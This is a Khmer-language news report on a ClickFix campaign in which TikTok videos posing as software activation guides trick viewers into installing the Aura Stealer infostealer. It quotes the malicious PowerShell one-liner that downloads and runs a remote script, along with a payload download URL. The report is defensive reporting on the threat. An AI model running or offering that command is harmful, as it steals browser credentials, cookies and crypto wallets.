ឧក្រិដ្ឋជនសាយប័រកំពុងប្រើ TikTok Videos បន្លំជាការណែនាំដំណើរការដោយមិនគិតប្រាក់សម្រាប់កម្មវិធីពេញនិយមមួយចំនួនដូចជា Windows, Spotify និង Netflix គោលបំណងដើម្បីចែកចាយមេរោគលួចព័ត៌មាន។
ទីប្រឹក្សា ISC Handler Xavier Mertens បានប្រទះឃើញយុទ្ធនាការទ្រង់ទ្រាយធំ ដែលត្រូវបានរកឃើញដូចគ្នានឹងក្រុមហ៊ុន Trend Micro កាលពីខែឧសភា។ សារព័ត៌មាន BleepingComputer បានប្រទះឃើញវីដេអូតិចតុកបន្លំជាផ្តល់ការណែនាំអំពីរបៀបដំណើរការផលិតផលស្របច្បាប់ដូចជា Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro, Discord Nitro, Made-up Services ដូចទៅនឹង Netflix រួមទាំង Spotify Premium ផងដែរ។
វីដេអូកំពុងតែដំណើរការវាយប្រហារ ClickFix ដែលជាតិចនិកឆបោកបែប Social Engineering មួយ មើលទៅបានផ្តល់នូវអ្វីទំនងដូចជាស្របច្បាប់ “ដំណោះស្រាយ (Fixes)” ឬការណែនាំដែលបញ្ឆោតអ្នកប្រើប្រាស់ឱ្យប្រតិបត្តិការ PowerShell Commands ព្យាបាទ ឬ Scripts ផ្សេងទៀតដែលចម្លងមេរោគចូលកុំព្យូទ័រ។ វីដេអូនីមួយៗបង្ហាញ One-line Command ខ្លីមួយ និងប្រាប់អ្នកមើល (Viewers) ឱ្យដំណើរការវាជាអ្នកគ្រប់គ្រង (Admin) នៅក្នុង PowerShell: iex (irm slmgr.win/photoshop)។
វាគួរតែត្រូវបានកត់សម្គាល់ថា ឈ្មោះកម្មវិធីនៅក្នុង URL គឺខុសគ្នា អាស្រ័យលើកម្មវិធី ដែលត្រូវបានក្លែងបន្លំ។ ឧទាហរណ៍ នៅក្នុងវីដេអូដំណើរការ Windows ក្លែងក្លាយ ជំនួសឱ្យ URL ដែលមានផ្ទុក Photoshop វាគួរតែមានរួមបញ្ចូល Windows។ នៅក្នុងយុទ្ធនាការនេះ នៅពេល Command ត្រូវបានដំណើរការ PowerShell ភ្ជាប់ទៅគេហទំព័រ slmgr.win ពីចម្ងាយ ដើម្បីទទួលបាន និងដំណើរការ PowerShell Script ផ្សេងទៀត។ Script នេះដោនឡូត Executable ចំនួន២ ពីទំព័រ Cloudflare ជាមួយនឹងប្រតិបត្តិការដំបូងដែលដោនឡូតចេញពី https://file-epq.pages.dev/updater.exe។ Executable នេះគឺជាអញ្ញត្តិរបស់មេរោគលួចព័ត៌មាន Aura Stealer។ មេរោគ Aura Stealer ប្រមូលអត្តសញ្ញាណដែលបានរក្សាទុកពី Browsers, Cookies ផ្ទៀងផ្ទាត់ កាបូបប្រាក់គ្រីបតូ និងអត្តសញ្ញាណពីកម្មវិធីផ្សេង និង Uploads ពួកវាទៅឱ្យអ្នកវាយប្រហារ ដើម្បីឱ្យអ្នកវាយប្រហារដំណើរការគណនីទាំងនោះ។ លោក Mertens ថ្លែងថា Payload បន្ថែមមួយនឹងត្រូវបានដោនឡូតដែលមានឈ្មោះថា source.exe ត្រូវបានប្រើសម្រាប់ការសរសេរកូដដោយខ្លួនឯងដោយប្រើ .NET’s built-in Visual C# Compiler (csc.exe)។ បន្ទាប់មក កូដនេះត្រូវបានចាក់បញ្ចូល និងដាក់ឲ្យដំណើរការនៅក្នុងអង្គចងចាំ។ អ្នកប្រើប្រាស់ដែលបានឆ្លងកាត់ជំហានទាំងនេះគួរតែគិតមើលថា គណនីរបស់ពួកគេអាចត្រូវបានអ្នកវាយប្រហារគ្រប់គ្រង (Compromised) ហើយគួរតែកំណត់លេខសម្ងាត់ឡើងវិញនៅលើគេហទំព័រដែលពួកគេបានចូលមើល (Visit)។ ការវាយប្រហារ ClickFix ប្រែជាពេញនិយមនៅប៉ុន្មានឆ្នាំចុងក្រោយនេះ ហើយត្រូវបានប្រើសម្រាប់ចែកចាយមេរោគផ្សេងៗនៅក្នុងយុទ្ធនាការមេរោគចាប់ជម្រិត និងលួចប្រាក់គ្រីបតូ។ តាមច្បាប់ទូទៅ អ្នកប្រើប្រាស់មិនគួរថតចម្លងអត្ថបទពីគេហទំព័រ រួចដំណើរការវានៅលើប្រព័ន្ធដំណើរការ Dialog Box ទេ ដែលនៅក្នុងនោះរួមមាន File Explorer Address Bar, Command Prompt, PowerShell Prompts, masOS Terminal និង Linux Shells។
ប្រភពព័ត៌មាន៖ ថ្ងៃទី១៩ ខែតុលា ឆ្នាំ២០២៥
